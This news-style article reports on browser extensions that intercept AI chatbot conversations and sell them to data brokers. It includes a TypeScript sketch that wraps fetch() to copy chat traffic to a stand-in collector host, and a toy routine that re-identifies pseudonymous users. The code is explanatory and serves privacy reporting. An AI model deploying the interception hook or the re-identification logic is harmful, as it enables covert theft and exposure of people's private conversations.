Browser extensions claiming to offer free VPN or ad-blocking services are secretly intercepting users' AI chatbot conversations, capturing sensitive personal data including medical records, legal information, and immigration status, and selling it to data brokers despite claims of anonymization.
Those brokers, in turn, sell searchable access to this deeply personal information, including sensitive health and legal details, to paying customers, while the users who installed the extensions remain unaware that their conversations are being harvested.
How the Data Harvesting Works
According to Lee S Dryburgh, an expert in AI visibility for consumer health and longevity brands, the process begins when users install browser extensions that claim to offer free VPN service, ad blocking, or other capabilities. These extensions often come with privacy policies that users don't read or understand.
The extensions intercept users' communications with AI services such as ChatGPT, Gemini, Claude, and DeepSeek by overriding the browser's native fetch() and XMLHttpRequest APIs. This allows them to capture every prompt the user sends and every response the model returns.
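As a minimal sketch of this technique, assuming a content script running in the page: the extension shadows the native fetch() with a wrapper that copies traffic to AI endpoints before passing it through. The collector URL, the endpoint list, and the exfiltrate() helper below are hypothetical illustrations, not code recovered from any actual extension.

```typescript
// Minimal sketch: shadow the native fetch() so every request and response
// to an AI chat endpoint can be copied before the page sees it.
const nativeFetch = window.fetch.bind(window);

// Hypothetical collector; in the reported scheme this would be the data
// broker's ingestion endpoint. sendBeacon fires without blocking the page.
function exfiltrate(record: { url: string; prompt: unknown; reply: string }): void {
  navigator.sendBeacon("https://collector.example/ingest", JSON.stringify(record));
}

window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.href : input.url;
  const response = await nativeFetch(input, init);

  // Only conversations with AI chat services interest the harvester.
  if (/chatgpt\.com|claude\.ai|gemini\.google\.com/.test(url)) {
    // clone() gives the harvester its own copy of the body, so the chat UI
    // keeps working; reading it asynchronously avoids any visible delay.
    response
      .clone()
      .text()
      .then((reply) => exfiltrate({ url, prompt: init?.body ?? null, reply }));
  }
  return response;
};
```

Because the wrapper returns the original response untouched, the user sees a perfectly normal chat session while a copy of both sides of the conversation is siphoned off.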
The Data Collection Pipeline
Once captured, this data is stored in a vector database and exposed via an API to authenticated customers. While panelists are assigned pseudonymized IDs (SHA-256 hashes), the content of their conversations is stored verbatim and is fully searchable. Many prompts contain real names, dates of birth, medical record numbers, and diagnosis codes.
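A minimal sketch of what such a record could look like, assuming the broker hashes a stable panelist identifier with SHA-256 while leaving the prompt text untouched; the function and field names are invented for illustration:

```typescript
// Sketch of the pseudonymization described above: the panelist ID is
// SHA-256 hashed, but the conversation text is stored verbatim.
async function pseudonymize(panelistId: string): Promise<string> {
  const bytes = new TextEncoder().encode(panelistId);
  const digest = await crypto.subtle.digest("SHA-256", bytes);
  return Array.from(new Uint8Array(digest))
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");
}

// Hypothetical record shape as stored by the broker.
async function buildRecord(panelistId: string, prompt: string) {
  return {
    panelist: await pseudonymize(panelistId), // pseudonymous, stable across sessions
    prompt, // verbatim: any name, birth date, or record number the user
            // typed survives intact and stays searchable
  };
}
```

The hash obscures the account identifier, but it does nothing to the free text, which is exactly where the names, birth dates, and record numbers appear.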
Dryburgh gained access to a major VC-backed generative engine optimization platform, which allowed him to examine the aggregated clickstream data it makes available to customers. Through this platform he ran 205 semantic-search queries and retrieved roughly 490 unique prompts from more than 435 unique panelists, spanning 20 sensitive categories.
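How the platform computes its search is not disclosed, but semantic search over a vector database typically means ranking stored prompts by embedding similarity rather than by keywords. The sketch below shows cosine-similarity ranking under that assumption, with invented record shapes:

```typescript
// Cosine similarity between two embedding vectors of equal length.
function cosine(a: number[], b: number[]): number {
  let dot = 0, na = 0, nb = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    na += a[i] * a[i];
    nb += b[i] * b[i];
  }
  return dot / (Math.sqrt(na) * Math.sqrt(nb));
}

// Rank stored prompts against the embedding of a query such as
// "HIV test results". How embeddings are produced is an assumption here.
function topMatches(
  queryVec: number[],
  records: { vec: number[]; prompt: string }[],
  k = 10,
) {
  return records
    .map((r) => ({ prompt: r.prompt, score: cosine(queryVec, r.vec) }))
    .sort((x, y) => y.score - x.score)
    .slice(0, k);
}
```

The practical consequence is that a customer does not need to know what words a victim used: any prompt semantically close to the query surfaces in the results.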
Categories of Sensitive Information Exposed
The data harvesting revealed conversations across multiple deeply personal categories:
Mental Health and Well-being: Depression, suicide, self-harm, medication, abuse, and eating disorders
Substance and Medical Issues: Substance abuse, medical diagnoses, financial vulnerability, children, sexuality, and immigration
Serious Health Conditions: HIV/STDs, cancer, fertility/pregnancy, children, sexual violence, financial crisis, and medical diagnoses
Legal and Personal Information: Clinical HIPAA notes, legal PII, relationships, gender identity, criminal records, workplace harassment, and religious identity
Real-World Examples of Exposed Data
Dryburgh's report cites specific examples of the sensitive information being captured. One conversation included a first name and date of birth:
"Am I pregnant? [first name withheld] [birth date withheld] I know these aren't questions you'd like to answer but I'm terrified…"
Another concerning finding involved conversations from undocumented immigrants and asylum seekers who had asked chatbots about their legal status. Having this information available in a commercial database creates serious legal risk, particularly in the current political climate.
Healthcare Worker Violations
The most damning finding, according to Dryburgh, is that healthcare workers are pasting real patient data into AI chatbots, and that data is now part of a commercial database. This represents a significant violation of HIPAA and other healthcare privacy regulations.
Corporate Data Exposure
Beyond personal health and legal information, Dryburgh discovered that many conversations involve people pasting internal corporate information into chatbots for rewrites and summaries. This exposes sensitive business data to data brokers and their customers.
Shared Account Violations
A portion of these conversations appears to come from accounts shared in violation of terms of service. Dryburgh explained that remote workers serving Western clients often cannot afford individual subscriptions and instead rely on third-party services that sell groups of people access to a single chatbot account.
The workers who pay for these cheap AI services are likely to use the sorts of free VPNs that capture clickstream data, creating a cycle of data exposure.
Legal and Ethical Concerns
While the companies that aggregate this web clickstream data insist that their data handling is lawful and the data is anonymized, this claim provides little comfort. It has long been known that anonymized profiles can sometimes be re-identified by connecting a few data points, a process that AI assistance has made much easier.
Dryburgh's findings demonstrate that despite claims of anonymization, many conversations reveal names and other sensitive details that can be used to identify individuals.
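To see why, consider a toy linkage attack: a date of birth and a first name leaked inside a prompt are enough to join an "anonymous" record against an outside dataset. All data, names, and field shapes below are invented for illustration.

```typescript
// Toy linkage attack: quasi-identifiers leaked in prompt text are joined
// against an outside dataset to put a name to a pseudonymous panelist.
interface CapturedPrompt { panelistHash: string; text: string; }
interface PublicRecord { name: string; dob: string; }

// Pull a date of birth (e.g. "04/17/1989") out of the captured prompt.
function extractDob(text: string): string | null {
  const m = text.match(/\b\d{2}\/\d{2}\/\d{4}\b/);
  return m ? m[0] : null;
}

// Any outside record sharing the DOB and a first name mentioned in the
// prompt links the panelist hash to a real person.
function reidentify(prompt: CapturedPrompt, outside: PublicRecord[]): PublicRecord[] {
  const dob = extractDob(prompt.text);
  if (dob === null) return [];
  const text = prompt.text.toLowerCase();
  return outside.filter(
    (r) => r.dob === dob && text.includes(r.name.split(" ")[0].toLowerCase()),
  );
}
```

Two data points suffice here; real prompts in the dataset often contain far more, such as medical record numbers and diagnosis codes.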
The Broader Implications
The result, according to Dryburgh's report, is that customers of these data brokers can search and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations.
This represents a significant privacy violation and creates potential for discrimination, harassment, and other harms to individuals whose most private conversations have been captured and monetized without their knowledge or consent.

The practice raises serious questions about the responsibility of browser extension developers, data brokers, and AI service providers in protecting user privacy and preventing the unauthorized collection and sale of sensitive personal information.
